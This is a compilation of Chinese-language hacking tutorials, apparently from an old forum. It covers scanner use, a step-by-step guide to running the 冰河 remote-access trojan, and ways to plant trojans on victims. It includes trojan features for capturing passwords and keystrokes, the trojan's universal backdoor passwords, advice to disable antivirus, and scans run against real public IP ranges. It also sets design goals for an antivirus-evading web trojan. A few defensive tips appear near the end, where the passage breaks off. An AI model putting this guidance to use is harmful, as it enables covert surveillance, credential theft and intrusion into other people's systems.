6、漏洞:这个名詞相信也不用太多的介绍,根據字面意思也可以理解,就好象一个房子,门很结实,可是有个窗户卻不好,这就很可能造成被别人进入,入侵是也是相对的,必须要有漏洞才可以入侵,这里順便介绍下打補丁的意思,还是用上面的例子门很结实,可窗户不好,这里我们需要把窗户補上,就叫打補丁了,许多人問过我怎样知道自己的机器有漏洞?怎样打補丁?这里也回答下,首先介绍怎样檢查自己奇迹有什么样的漏洞,有款工具簡稱为MBSA是微软公司針对windows系统的安全檢測工具,大家可以去网上找到自己下下来檢測下自己机器有什么样的漏洞,还介绍下微软的漏洞名稱 MS05-001MS05-002 这种形式的前面MS应为是微软的意思吧,05呢是2005年,001是在2005年第一个漏洞(不知道解释的对不,自己的理解)大家还可以下个金山毒霸,金山可以有个漏洞檢測功能,还可以帮你補上相应的補丁,那么怎么打補丁呢?其实这个很簡單,在微软的官方网站里可以輸入 MS05-001(如果你有这个漏洞的話)微软就找出了回应的補丁,下載下来 安装下其实就可以了,呵呵,打補丁也不是什么困难的事情哦。
7、埠:这个是入侵是很重要的一个環节,埠这个東西就好象是我要買東西,需要在1号視窗来结帳,而开放的1号視窗就好比回应的埠,埠可以形象的比喻成視窗,呵呵,不同的埠开放了不同的服務,大家可以在网上找到埠对照表来看下不同的埠开放的是什么服務。
8、许可权:这个東西和人权一个效果,我们有自己的权利,但是我们的权利不能超出自己的範圍,比如法律可以控制人的生命,这种最高许可权呢就是电脑中的 Admin许可权 最高许可权,法官呢是执行法律的人,比法律底点,这个呢就是SYSTEM许可权,系统许可权,以下每种人有者自己不同的许可权,比如我们得到了个WEBSHELL许可权,许多人不知道这个是什么许可权,其实就是个WEB(网業)的管理许可权,许可权一般比较低,但是有时想得到个伺服器的ADMIN许可权,就可以先叢WEBSHELL许可权来入手,也就是长说的提权。
==================================================
骇客利器流光使用技巧
流光这款软体除了能够像X-Scan那样扫描眾多 漏洞、弱口令外,还集成了常用的入侵工具,如字典工具、NT/IIS工具等,还独創了能够控制“肉雞”进行扫描的“流光Sensor工具”和为“肉雞”安装服務的“种植者”工具。
[img]http://cimg.163.com/catchpic/0/01/017362E7E9CD9FEFEA3E63510AD2FAA9.jpg'border=0 onclick="if(this.width>screen.width-461)window.open('http://cimg.163.com/catchpic/2/28/2871E56A479E3E885BD7990B82DB3958.jpg[j/img]
單击主机列表中的主机便可以直接对目标主机进行連接操作,如圖所示。
除了使用“高级扫描嚮導”配置高级扫描外,还可以直接选取高级扫描工具,如圖所示。
打开“高级扫描設置”,其介面如圖所示。
关于流光的使用就介绍到这里,本节中所介绍的只是流光功能的一小部分,其他一些功能会在以后的实例中逐一介绍。流光扫描器自身的設置是比较复杂的,有很多选项可以自由設定,因而也给使用者更大的发揮空间,可以根據网路和机器的狀況来尝试改变这些設置,提高扫描器的性能,而且流光中还有詳細的FAQ問題解答。
木马工具詳解+入门工具使用
现在我们来看看木马在骇客学习中的作用。首先学习者要明確木马究竟是什么,同时还要搞清楚木马的类型,并且学习一些流行的木马程式的用法,这是一个相輔相成的学习进程,当骇客利用漏洞进入伺服器之后,就可以选择两条路:一、破坏系统、获得资料、顯示自己;二、利用木马为自己开闢一个合法的登录帳号、掌管系统、利用被入侵系统作为跳板繼續攻击其他系统。
由此看来,木马程式是为第二种情況涉及的一种可以远端控制系统的程式,根據实现木马程式的目的,可以知道这种程式应该具有以下性質:
1、伪装性:程式将自己的服務端伪装成合法程式,并且具有誘惑力的让被攻击者执行,在程式被啟动后,木马代码会在未经授权的情況下运行并装載到系统开始运行进程中;
2、隱藏性:木马程式通病毒程式一样,不会暴露在系统进程管理器内,也不会让使用者察覺到木马的存在,它的所有动作都是伴隨其他程式的运行进行的,因此在一般情況下使用者很难发现系统中木马的存在;
3、破坏性:通过远端控制,骇客可以通过木马程式对系统中的檔进行刪除、编輯操作,还可以进行諸如格式化硬碟、改变系统啟动參数等惡性破坏操作;
4、竊密性:木马程式最大的特点就是可以窺視被入侵电脑上的所有资料,这不僅包括硬碟上的檔,还包括顯示器畫面、使用者在操作电脑过程中在硬碟上輸入的所有命令等。
看了上面的介绍,学习者应该对木马程式的用途有了一个初步了解,并且区分清除木马程式和病毒之间的相同点和不同点,由于骇客手段的日益增多,许多新出现的骇客手段(例如 D.O.S)经常会让学习者思维混乱,但实际上这些新出现的骇客手段都是从最开始的溢出、木马演变出来的,因而对于初学者来说,并不需要急于接触过多的新技术,而是要对最基本的也是最有效的骇客技术进行深入学习。
一、木马的原理:
大多数木马程式的基本原理都是一样的,他们是由两个程式配合使用——被安装在入侵系统内的Server程式;另一个是对Server其控制作用的Client程式。学习者已经了解了木马和病毒的区别,大多数Server程式不会像病毒一样主动传播,而是潛伏在一些合法程式内部,然后由目标操作者親手将其安装到系统中,雖然这一切都是没有经过目标操作者授权的,然而从某种程度上说,这的確是在经过誘惑后目标“心甘情願”接收木马的,当Server安装成功后,骇客就可以通过Client控制程式对Server端进行各种操作了。
木马程式的Server端为了隱藏自己,必须在設計中做到不让自己顯示到任務欄或者系统进程控制器中,同时还不会影響其他程式的正常运行,当使用者电脑处于断线狀態下,Server段不会发送任何资讯到預設的埠上,而会自动檢測网路狀態直到网路連接好,Server会通过email或者其他形式将Server端系统资料通知Client端,同时接收Client发送出来的请求。
二.木马实戰:
先说国產木马老大,冰河-----你不得不了解的工具。
(编者殘语:)说到冰河,也许在2005年的今天顯得很落后,但冰河創造了一个时代,一个人人能做骇客的时代。使用方便簡單,人人都能上手。圖形介面,中文功能表,了解木马,先从了解远端控制软体冰河开始。
======================================================
使用冰河前,请注意:如果你的机器有殺毒软体,可能会出现病毒提示。说实話,他还真是一个病毒。呵呵。所以在使用前,请慎重考慮,出了問題,小编可擔当不起。建议使用不管是用户端还是服務端都请关閉殺毒软体以达到更好的使用效果。
======================================================
软体功能概述:
该软体主要用于远端監控,具体功能包括:
1.自动跟踪目的机螢幕变化,同时可以完全类比鍵盤及滑鼠輸入,即在同步被控端螢幕变化的同时,監控端的一切鍵盤及滑鼠操作将反映在被控端螢幕(局域网适用);
2.记录各种口令资讯:包括开机口令、屏保口令、各种共用资源口令及絕大多数在对話方塊中出现过的口令资讯,且1.2以上的版本中允许用户对该功能自行擴充,2.0以上版本还同时提供了击鍵记录功能;
3.获取系统资讯:包括电脑名、註冊公司、当前用户、系统路徑、作業系统版本、当前顯示解析度、物理及邏輯磁片资讯等多项系统资料;
4.限制系统功能:包括远端关机、远端重啟电脑、鎖定滑鼠、鎖定系统熱鍵及鎖定註冊表等多项功能限制;
5.远程檔操作:包括創建、上传、下載、复制、刪除檔或目录、檔壓縮、快速流览文字檔案、远端打开檔(提供了四中不同的打开方式——正常方式、最大化、最小化和隱藏方式)等多项檔操作功能;
6.註冊表操作:包括对主鍵的流览、增刪、复制、重命名和对鍵值的读写等所有註冊表操作功能;
7.发送资讯:以四种常用圖示向被控端发送簡短资讯;
8.点对点通讯:以聊天室形式同被控端进行线上交談。
一.文件列表:
1. G_Server.exe: 被監控端后台監控程序(运行一次即自动安装,可任意改名),在安装前可以先通过'G_Client'的'配置本端伺服器程式'功能进行一些特殊配置,例如是否将动態IP发送到指定信箱、改变監听埠、設置访問口令等);
2. G_Client.exe: 監控端执行程式,用于監控远端电脑和配置伺服器程式。
二.準備工作:
冰河是一个基于TCP/IP协定和WINDOWS作業系统的网路工具,所以首先应確保该协定已被安装且网路連接无误,然后配置伺服器程式(如果不进行配置则取默认設置),并在欲監控的电脑上运行伺服器端監控程序即可。
三.升级方法:
由于冰河2.0的改版较大,所以2.0以后版本與以前各版本完全不相容。为此只能向老用户提供一套升级方案:对于1.1版本的用户(好象已经没什么人用了),可以先用1.1或1.2版的CLIENT端将新版本的SERVER程式上传至被監控端,然后执行'檔打开'命令即可;对于1.2版本的用户相对簡單,只要通过1.2版的CLIENT远端打开新版本的SERVER程式就可以自动升级了。2.0以后的各版本完全相容。
'DARKSUN專版'中还提供了另一种升级方法,可以免去在不同版本中切换的麻煩。如果您不能確定远端主机的冰河版本,在用'檔管理器'流览目录前,最好先在工具欄下的'当前連接'列表框中选择打算連接的主机,然后直接点'升级1.2版本'按鈕进行升级,如果返回的资讯是'无法解释的命令',那说明远端主机安装了2.0以上版本,具体的版本及系统资讯可以通过'命令控制台'的'口令类命令\系统资讯及口令\系统资讯'来查看。
四.各模組簡要说明:
安装好伺服器端監控程序后,运行用户端程式就可以对远端电脑进行監控了,用户端执行程式的各模組功能如下:
1. "添加主机": 将被監控端IP位址添加至主机列表,同时設置好访問口令及埠,設置将保存在'Operate.ini'檔中,以后不必重輸。如果需要修改設置,可以重新添加该主机,或在主介面工具欄内重新輸入访問口令及埠并保存設置;
2. "刪除主机": 将被監控端IP位址从主机列表中刪除(相关設置也将同时被清除);
3. "自动搜索": 搜索指定子网内安装有'冰河'的电脑。(例如欲搜索IP地址'192.168.1.1'至'192.168.1.255'网段的电脑,应将'起始域'設为'192.168.1',将'起始位址'和'终止位址'分别設为'1'和'255');
4. "查看螢幕": 查看被監控端螢幕(相当于命令控制台中的'控制类命令\捕获螢幕\查看螢幕');
5. "螢幕控制": 远端类比滑鼠及鍵盤輸入(相当于命令控制台中的'控制类命令\捕获螢幕\螢幕控制')。其余同"查看螢幕";
6. "冰河信使": 点对点聊天室,也就是传说中的'二人世界';
7. "升级1.2版本": 通过'DARKSUN專版'的冰河来升级远端1.2版本的伺服器程式;
8. "修改远端配置": 线上修改访問口令、監听埠等伺服器程式設置,不需要重新上传整个檔,修改后立即生效;
9. "配置本端伺服器程式": 在安装前对'G_Server.exe'进行配置(例如是否将动態IP发送到指定信箱、改变監听埠、設置访問口令等)。
五.文件管理器操作说明:
檔管理器对檔操作提供了下列滑鼠操作功能:
1. 文件上传:右鍵單击欲上传的檔,选择'复制',在目的目录中粘帖即可。也可以在目的目录中选择'檔上传自',并选定欲上传的文件;
2. 文件下載:右鍵單击欲下載的檔,选择'复制',在目的目录中粘帖即可。也可以在选定欲下載的檔后选择'檔下載至',并选定目的目录及檔案名;
3. 打开远端或本地檔:选定欲打开的檔,在彈出功能表中选择'远端打开'或'本地打开',对于可执行檔若选择了'远端打开',可以进一步設置檔的运行方式和运行參数(运行參数可为空);
4. 刪除檔或目录:选定欲刪除的檔或目录,在彈出功能表中选择'刪除';
5. 新建目录:在彈出功能表中选择'新建檔夾'并輸入目录名即可;
6. 文件查找:选定查找路徑,在彈出功能表中选择'檔查找',并輸入檔案名即可(支持通配符);
7. 拷貝整个目录(只限于被監控端本机):选定原始目录并复制,选定目的目录并粘帖即可。
六.命令控制台主要命令:
1. 口令类命令: 系统资讯及口令、歷史口令、击鍵记录;
2. 控制类命令: 捕获螢幕、发送资讯、进程管理、視窗管理、滑鼠控制、系统控制、其他控制(如'鎖定註冊表'等);
3. 网路类命令: 創建共用、刪除共用、查看网路资讯;
4. 文件类命令: 目录增刪、文本流览、檔查找、壓縮、复制、移动、上传、下載、刪除、打开(对于可执行檔则相当于創建进程);
5. 註冊表读写: 註冊表鍵值读写、重命名、主鍵流览、读写、重命名;
6. 設置类命令: 更换墙紙、更改电脑名、读取伺服器端配置、线上修改伺服器配置。
七.使用技巧:
1. 用'查看螢幕'命令抓取对方螢幕资讯后,若希望程式自动跟踪对方的螢幕变化,在右鍵彈出功能表中选中'自动跟踪'项即可;
2. 在檔操作过程中,滑鼠雙击本地檔将在本地开该檔;滑鼠雙击远端檔将先下載该檔至臨时目录,然后在本地打开;
3. 在使用'网路共用創建'命令时,如果不希望其他人看到新創建的共用名稱,可以在共用名稱后加上'$'符号。自己欲流览时只要在IE的位址欄或'开始菜單'的'运行'对話方塊内鍵入'\\[机器名]\[共用名稱(含'$'符号)]即可;
4. 在1.2以后的版本中允许用户設定捕获圖像的色深(1~7级),圖像将按設定保存为2的N次方种顏色(N=2的[1~7]次方),即1级为單色,2级为16色,3级为256色,依此类推。
需要说明的是如果将色深設为0或8则表示色深依被監控端当前的解析度而定,适当減小色深可以提高圖像的传輸速度。
2.1以后的版本新增了以JPEG格式传輸圖像的功能,以利于在INTERNET上传輸圖像,但这项功能只适用于2.1以上版本(制被控端),否则实际上仍是通过BMP圖像格式传輸,所以请先確认版本后再使用。
八.常見問題:
1. 安装不成功,该問題通常是由于TCP/IP协议安装或設置不正確所致;
2. 被監控端啟动时或與監控端連接时彈出'建立連接'对話方塊,该問題是由于系统設置了自动撥号屬性。可以通过安装前定制伺服器程式来禁止自动撥号;
3. 可以連接但没有反应,通常是版本不匹配所致,因为1.2以前的版本設計上存在缺陷,所以如果您不能確定远端主机的冰河版本,最好先按照前面所说的升级辦法试一下,否则被監控端可能会出现错误提示。另外冰河没有提供代理功能,局域网外无法監控局域网内的机器,除非被控端是閘道;
4. '更换墙紙'命令无效,这个問題的可能性太多了,较常見的原因是被監控端的桌面設置为'按WEB页查看';
5. 对被監控端进行檔或目录的增刪操作后,少数情況不会自动刷新,可以通过[Ctrl+R]或选择彈出功能表的'刷新'命令手动刷新;
6. 开机口令不正確,因为CMOS口令是單向编码,所以编码后的口令是不可逆也是不唯一的,冰河通过窮举算出来的口令可能與原口令不符,但也是有效口令。毛主席说过没有調查就没有发言权,所以没有试过就千萬别妄下定论;
7. 佔用系统资源过高,其实準確的说应该是CPU利用率过高,系统资源佔用并不算过分,这主要是不断探測口令资讯(敏感字元)造成的,所以在'DARKSUN專版'中允许用户将该功能遮罩(我实在不知道怎样才能兼顧魚和熊掌),只要在配置时清空'敏感字元'中的所有字串就行了。
8. 如何卸載冰河,这是我解答次数最多的一个問題,其实冰河1.2正式版以后的各版本都在CLIENT端提供了徹底的卸載功能。对于1.2版本,请执行命令列表中的'自动卸載'命令,对其以后的版本,请执行'命令控制台'中的'控制类命令\系统控制\自动卸載冰河'。
小编有言:说说卸冰河木马方法和冰河的通用密码
很多朋友問我中了木马“冰河”有什么方法可以卸掉,其实很簡單,有两个方法:
(1)用殺毒软体“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后
打不开本文檔了,那你可以用手动方法去卸。如果你覺得那个辦法太麻煩,可以用我介绍的第二种方法。
(2)用“冰河”卸“冰河”: 如果你確定你的机器种了冰河,那你上网后开啟冰河。 在增添主机那里添自己的IP。 然后电击自己的IP, 选命令控制台那里选控制命令里的系统命令。 然后自己看啦。不要再说你不会啊。我会暈的啊。:)
冰河通用密码
3.0版:yzkzero.51.net
3.0版:yzkzero!
3.1-netbug版密码: 123456!@
2.2殺手專版:05181977
2.2殺手專版:dzq2000!
文:殘
了解如何种植木马才能防止别人种植木马。看看一般人用的手段。(本文比较适合入门级别选手)
1.网吧种植
这个似乎在以前很流行,先关閉网吧的放火墙,再安装木马用户端,立刻结帳下机,注意,重点是不要重起机器,因为现在网吧都有还原精靈,所以在不关机器的情況下,木马是不会给发现的。因此,在网吧上网,首先要重起机器,其次看看殺毒软体有没有打开。最后建议,不要在网吧打开有重要密码的東西,如网路銀行等。毕竟现在木马用户端躲避防火墙的能力很強,其次是还存在其他的病毒。
2.通讯软体传送
发一条消息给你,说,“这个我的照片哦,快看看。”当你接受并打开的时候,你已经中了木马了。(此时,你打开的檔好象“没有任何反应”)“她”可能接者说说:“呀,发错了。再見。”防禦:不要輕易接受别人传的東西,其次是打开前要用殺毒软体查毒。
3.恐怖的捆綁
捆綁软体现在很多,具体使用就是把木马用户端和一个其他檔捆綁在一起(拿JPG圖像为例),你看到的檔可能是.jpg,圖示也是正常(第2条直接传的木马用户端是个windows无法识别檔的圖示,比较好认),特别是现在有些捆綁软体对捆綁过后的软体进行優化,殺毒软体很难识别其中是否包含木马程式。建议:不要打开陌生人传递的檔。特别是圖像檔。(誘惑力大哦)
4.高深的编譯
对木马客户程式进行编譯。让木马更加难以识别。(其实效果同第三条)
5.微妙的网页嵌入
将木马安装在自己的主页里面,当你打开页面就自动下載运行。(見下篇,打造网页木马)“你中獎了,请去www.**.com領取你的獎品”,骇客可能这么和你说。建议:陌生人提供的网页不要打开,不要去很奇怪名字的网站。及时升级殺毒软体。
總结:及时升级殺毒软体。不要打开未知檔以及陌生人传来的檔。不要隨便打开陌生网页。升级最新版本的作業系统。还有....请看本專題以后的文章咯。
============================================================
你也可以当骇客 打造完美的IE网页木马
(殘语:比较适合骇客中级选手,日后将推出視頻教程)
既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标準,我个人认为一个完美的IE网页木马至少应具備下列四项特徵:
一:可以躲过殺毒软体的追殺;
二:可以避开网路防火墙的報警;
三:能够适用于多数的Windows作業系统(主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003)中的多数IE版本(主要包括IE5.0、IE5.5、IE6.0),最好能打倒SP補丁;
四:让流览者不容易发覺IE变化,即可以悄无聲息,从而可以长久不被发现。
(注意以上四点只是指网页本身而言,但不包括你的木马程式,也就是说我们的网页木马只是負責运行指定的木马程式,至于你的木马程式的好坏只有你自己去选择啦!别找我要,我不会写的哦!)
满足以上四点我想才可以让你的马兒更青春更长久,跑的更歡更快……
看了上面的几点你是不是心动拉?别急,我们还是先侃侃现有的各种IE网页木马的不足吧!
第一种:利用古老的MIME漏洞的IE网页木马
这种木马现在还在流行,但因为此漏洞太过古老且适用的IE版本较少,而当时影響又太大,補丁差不多都補上啦,因此这种木马的种植成功率比较低。
第二种:利用com.ms.activeX.ActiveXComponent漏洞,结合WSH及FSO控制项的IE网页木马
雖然com.ms.activeX.ActiveXComponent漏洞廣泛存在于多数IE版本中,是一个比较好的漏洞,利用价值非常高,但卻因为它结合了流行的病毒調用的WSH及FSO控制项,使其雖说可以避开网路防火墙的報警,可逃不脫殺毒软体的追捕(如諾頓)。
第三种:利用OBJECT物件类型確认漏洞(ObjectDataRemote)并结合WSH及FSO控制项的IE网页木马(典型的代表有动鯊网页木马生成器)
此种木马最大的優点是适应的IE版本多,且漏洞较新,但卻有如下不足:
1、因为此漏洞要調用Mshta.exe来访問网路下載木马程式,所以会引起防火墙報警(如天网防火墙);
2、如果此IE网页木马又利用了WSH及FSO控制项,同样逃不脫殺毒软体的追捕(如諾頓),而动鯊网页木马又恰恰使用了WSH及FSO控制项,歎口氣……可惜呀……?
3、再有就是这个漏洞需要网页伺服器支援动態网页如ASP、JSP、CGI等,这就影響了它的发揮,毕竟现在的免費穩定的动態网页空间是少之又少;雖说此漏洞也可利用郵件MIME的形式来利用,但经測试发现对IE6.0不起作用。
看到上面的分析你是不是有了这种感覺:千軍易得,一将难求,马兒成群,奈何千里马难寻!别急,下面让我帶这大家一起打造我心中的完美IE网页木马。
=======================================================
扫描器的使用
这里我使用x-scanner作为介绍物件,原因是x-scanner集成了多种扫描功能于一身,它可以采用多线程方式对指定IP位址段(或独立IP位址)进行安全漏洞扫描,提供了圖形介面和命令行两种操作方式,扫描内容包括:标準埠狀態及埠banner资讯、CGI漏洞、RPC漏洞、SQL-SERVER默认帳户、FTP弱口令,NT主机共用资讯、用户资讯、組资讯、NT主机弱口令用户等。扫描结果保存在/log/目录中,index_*.htm为扫描结果索引檔。对于一些已知的CGI和RPC漏洞,x-scanner给出了相应的漏洞描述、利用程式及解决方案,节省了查找漏洞介绍的时间。
首先x-scanner包括了两个运行程式:xscann.exe和xscan_gui.exe,这两个程式分别是扫描器的控制台版本和視窗版本,作为初学者可能更容易接受視窗版本的扫描软体,因为毕竟初学者使用最多的还是“应用程式”,无论运行那一个版本,他们的功能都是一样的。首先让我们运行視窗版本看看:視窗分为左右两部分,左面是进行扫描的类型,这包括前面提到的漏洞扫描、埠扫描等基本内容;另一部分是有关扫描範圍的設定,xscanner可以支持对多个IP位址的扫描,也就是说使用者可以利用xscanner成批扫描多个IP位址,例如在IP位址範圍内輸入211.100.8.1-211.100.8.255就会扫描整个C类的255台伺服器(如果存在的話),这样骇客可以針对某一个漏洞进行搜索,找到大範圍内所有存在某个漏洞的伺服器。当然如果只輸入一个IP位址,扫描程式将針对單独IP进行扫描。
剩下的埠設定在前面已经介绍过,一般对于网站伺服器,这个埠选取80或者8080,对于某些特殊的伺服器也许还有特殊的埠号,那需要通过埠扫描进行寻找。多线程扫描是这个扫描器的一大特色,所谓多线程就是说同时在本地系统开闢多个socket連接,在同一时间内扫描多个伺服器,这样做的好处是提高了扫描速度,节省时间,根據系统的资源配置高低,线程数位也可以自行設定(設定太高容易造成系统崩溃)。
在圖形介面下我们看到了程式連接位址“.\xscan.exe”,这实际上就是xscanner的控制台程式,也就是说圖形視窗只是将控制台扫描器的有关參数設置做了“傻瓜化”处理,程式运行真正执行的还是控制台程式。因此学习控制台是骇客所必需的,而且使用控制台模式的程式也是真正骇客喜爱的操作方式。
现在我们进行一个簡單的cgi漏洞扫描,这次演练是在控制台模式下进行的:xscan211.100.8.87 -port
这个命令的意思是让xscanner扫描伺服器211.100.8.87的开放埠,扫描器不会对65535个埠全部进行扫描(太慢),它只会檢測网路上最常用的几百个埠,而且每一个埠对应的网路服務在扫描器中都已经做过定義,从最后返回的结果很容易了解伺服器运行了什么网路服務。扫描结果顯示如下:
Initialize dynamic librarysucceed.
Scanning 211.100.8.87......
[211.100.8.87]: Scaningport state ...
[211.100.8.87]: Port 21 islistening!!!
[211.100.8.87]: Port 25 islistening!!!
[211.100.8.87]: Port 53 islistening!!!
[211.100.8.87]: Port 79 islistening!!!
[211.100.8.87]: Port 80 islistening!!!
[211.100.8.87]: Port 110 islistening!!!
[211.100.8.87]: Port 3389is listening!!!
[211.100.8.87]: Port scancompleted, found 7.
[211.100.8.87]: All done.
这个结果还会同时在log目录下生成一个html文檔,阅读文檔可以了解发放的埠对应的服務專案。从结果中看到,这台伺服器公开放了七个埠,主要有21埠用于檔传輸、80埠用于网页流览、还有110埠用于pop3电子郵件,如此一来,我们就可以进行有关服務的漏洞扫描了。(关于埠的詳細解释会在后續给出)
然后可以使用流览看看这个伺服器到底是做什么的,通过流览发现原来这是一家報社的电子版面,这样骇客可以繼續对伺服器进行漏洞扫描查找伺服器上是否存在perl漏洞,之后进行进一步进攻。
漏洞扫描的道理和埠扫描基本上类似,例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台伺服器上所有开放了80埠的伺服器上是否存在漏洞,并且找到存在什么漏洞,则可以使用xscan61.135.50.1-61.135.50.255 -cgi进行扫描,因为结果比较多,通过控制台很难阅读,这个时候xscanner会在log下生成多个html的中文说明,进行阅读这些文檔比较方便。
二、扫描器使用問題:
載使用漏洞扫描器的过程中,学习者可能会经常遇到一些問題,这里给出有关問題產生的原因和解决辦法。扫描器的使用并不是真正骇客生涯的开始,但它是学习骇客的基础,所以学习者应该多加练习,熟练掌握手中使用的扫描器,了解扫描器的工作原理和問題的解决辦法。
1、为什么我找不到扫描器報告的漏洞?
扫描器報告伺服器上存在某个存在漏洞的檔,是发送一个GET请求并接收伺服器返回值来判断檔是否存在,这个返回值在HTTP的协议中有詳細的说明,一般情況下“200”是檔存在,而“404”是没有找到檔,所以造成上面现象的具体原因就暴露出来了。
造成这个問題的原因可能有两种:第一种可能性是您的扫描器版本比较低,扫描器本身存在“千年蟲”問題,对于返回的资讯扫描器在判断的时候,会错误的以为时间资讯2000年x月x日中的200是“檔存在”标誌,这样就会造成误報;
另外一种可能性是伺服器本身对“檔不存在”返回的頭部资讯进行了更改,如果GET申请的檔不存在,伺服器会自动指向一个“没有找到页面”的文檔,所以无论檔是否存在,都不会将“404”返回,而是仍然返回成功资讯,这样做是为了迷惑漏洞扫描器,让攻击者不能真正判断究竟那个漏洞存在于伺服器上。
这一問題的解决辦法也要分情況討论,一般说来第一种情況比较容易解决,直接升级漏洞扫描器就可以了,对于第二种情況需要使用者对网路比较熟悉,有能力的話可以自己编写一个漏洞扫描器,自己编写的扫描器可以針对返回檔的大小进行判断,这样就可以真正確定檔是否存在,但这种方法对使用者的能力要求较高。
2、我使用的扫描器速度和网路速度有关係嘛?
关係不大。扫描器发送和接收的资讯都很小,就算是同时发送上百个GET请求一般的电話上网用户也完全可以做得到,影響扫描器速度的主要因素是伺服器的应答速度,这取决于被扫描伺服器的系统运行速度。如果使用者希望提高自己的扫描速度,可以使用支援多线程的扫描器,但是因为使用者本地电脑檔次問題,也不可能将线程設置到上百个,那样的話会造成本地系统癱瘓,一般使用30个线程左右比较合适。
另外对于很多网路服務器来说,为了防止骇客的扫描行为,可能会在防火墙上設置同一IP的單位时间GET申请数量,这样做目的就是避免骇客的扫描和攻击,所以在提高本地扫描速度之前,应该先確认伺服器没有相应的过濾功能之后再使用。
3、扫描器報告给我的漏洞无法利用是什么原因?
確切地说扫描器報告的不是“找到的漏洞”,而是找到了一个可能存在漏洞的檔,各种网路应用程式都可能存在漏洞,但是在更新版本的过程中,老版本的漏洞会被修補上,被扫描器找到的檔应该经过手工操作確认其是否是存在漏洞的版本,这可以通过阅读网路安全网站的“安全公告”获得相应知识。
对于已经修補上漏洞的檔来说,也不代表它一定不再存有漏洞,而只能说在一定程度上没有漏洞了,也许在明天,这个新版本的檔中又会被发现还存在其他漏洞,因此这需要网路安全爱好者时刻关注安全公告。当然如果攻击者或者网路管理员对编程比较熟悉,也可以自己阅读程式并力圖自己找到可能的安全隱患,很多世界者名的骇客都是不依*他人,而是自己寻找漏洞进行攻击的。
4、扫描器版本比较新,然而卻从来没有找到过漏洞是什么原因?
有一些扫描器專门設計了“等待时间”,经过設置可以对等待返回资讯的时间进行調整,这就是说在“网路連接超时”的情況下,扫描器不会傻傻的一直等待下去。但如果你的网路速度比较慢,有可能造成扫描器没有来得及接收返回资讯就被认为“超时”而越了过去繼續下面的扫描,这样当然是什么也找不到啦。
如果問題真的如此,可以将等待时间設置的长一些,或者换个ISP撥号連接。
5、扫描器報告伺服器没有提供HTTP服務?
网路上大多数HTTP伺服器和漏洞扫描器的默认埠都是80,而有少量的HTTP伺服器并不是使用80埠提供服務的,在確认伺服器的確开通了网站服務的情況下,可以用埠扫描器察看一下对方究竟使用什么埠进行的HTTP服務,网路上常見的埠还有8080。
另外这种情況还有一种可能性,也许是使用者对扫描器的參数設置不正確造成的,很多扫描器的功能不僅僅是漏洞扫描,有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能,因此在使用每一款扫描器之前,都应该自己阅读有关的帮助说明,確保問題不是出在自己身上。
6、扫描器使用过程中突然停止回应是为什么?
扫描器停止回应是很正常的,有可能是因为使用者連接的线程过多,本地系统资源不足而造成系统癱瘓、也可能是因为对方伺服器的回应比较慢,依次发送出去的请求被同时反送回来而造成资讯阻塞、还有可能是伺服器安装了比较惡毒的防火墙,一旦察覺有人扫描就发送特殊的资料報回来造成系统癱瘓……
因此扫描器停止回应不能簡單的说是为什么,也没有一个比较全面的解决方案,不过一般情況下遇到这种問題,我建议你可以更换其他扫描器、扫描另外一些伺服器试试,如果問題还没有解决,就可能是因为扫描器與你所使用的系统不相容造成的,大多数基于微软視窗的漏洞扫描器都是运行在Windows9X下的,如果是Win2000或者NT也有可能造成扫描器无法正常工作。
7、下載回来的扫描器里面怎么没有可执行檔?
扫描器不一定非要是可执行的exe檔,其他例如perl、cgi脚本语言也可以编写扫描器,因此没有可执行檔的扫描器也许是运行在网路服務器上的,这种扫描器可以被植入到网路上的其他系统中,不需要使用者上网就能够24小时不停的进行大面积位址扫描,并将结果整理、分析,最后通过Email发送到指定的电子信箱中,因此这是一种比较高级的扫描器,初学者不适合使用。
另外注意載下在扫描器的时候注意壓縮報檔的副檔名,如果是tar为副檔名,那么这个扫描器是运行在Linux系统下的,这种其他操作平台的扫描器无法在視窗平台下应用,檔格式也和FAT32不一样。
8、扫描器只報告漏洞名稱,不報告具体文件怎么辦?
只要漏洞被发现,网路安全組織即会为漏洞命名,因此漏洞名稱对应的檔在相当廣泛的範圍内都是统一的,只要知道了漏洞的名稱,骇客就可以通过專门的漏洞搜索引擎进行查找,并且学习到與找到漏洞相关的詳細资讯。这种“漏洞搜索引擎”在网路上非常多,例如我国“綠盟”提供的全中文漏洞搜索引擎就是比较理想的一个。
===========================================================
如何防範骇客
骇客对伺服器进行扫描是輕而易举的,一旦找到了伺服器存在的問題,那么后果将是嚴重的。这就是说作为网路管理员应该采取不要的手段防止骇客对伺服器进行扫描,本节我将談談如何才能让自己的伺服器免遭骇客扫描。
一、防範骇客心得体会:
1、遮罩可以IP位址:
这种方式見效最快,一旦网路管理员发现了可疑的IP位址申请,可以通过防火墙遮罩相对应的IP位址,这样骇客就无法在連接到伺服器上了。但是这种方法有很多缺点,例如很多骇客都使用的动態IP,也就是说他们的IP位址会变化,一个位址被遮罩,只要更换其他IP仍然可以进攻伺服器,而且高级骇客有可能会伪造IP地址,遮罩的也许是正常用户的地址。
2、过濾资讯包:
通过编写防火墙規则,可以让系统知道什么样的资讯包可以进入、什么样的应该放棄,如此一来,当骇客发送有攻击性资讯包的时候,在经过防火墙时,资讯就会被丟棄掉,从而防止了骇客的进攻。但是这种做法仍然有它不足的地方,例如骇客可以改变攻击性代码的形態,让防火墙分辨不出资讯包的真假;或者骇客乾脆无休止的、大量的发送资讯包,知道伺服器不堪重負而造成系统崩溃。
3、修改系统协定:
对于漏洞扫描,系统管理员可以修改伺服器的相应协定,例如漏洞扫描是根據对檔的申请返回值对檔存在进行判断的,这个数值如果是200则表示檔存在于伺服器上,如果是404则表明伺服器没有找到相应的檔,但是管理员如果修改了返回数值、或者遮罩404数值,那么漏洞扫描器就毫无用处了。
4、经常升级系统版本:
任何一个版本的系统发佈之后,在短时间内都不会受到攻击,一旦其中的問題暴露出来,骇客就会蜂擁而致。因此管理员在维护系统的时候,可以经常流览者名的安全站点,找到系统的新版本或者補丁程式进行安装,这样就可以保证系统中的漏洞在没有被骇客发现之前,就已经修補上了,从而保证了伺服器的安全。
5、及时備份重要资料:
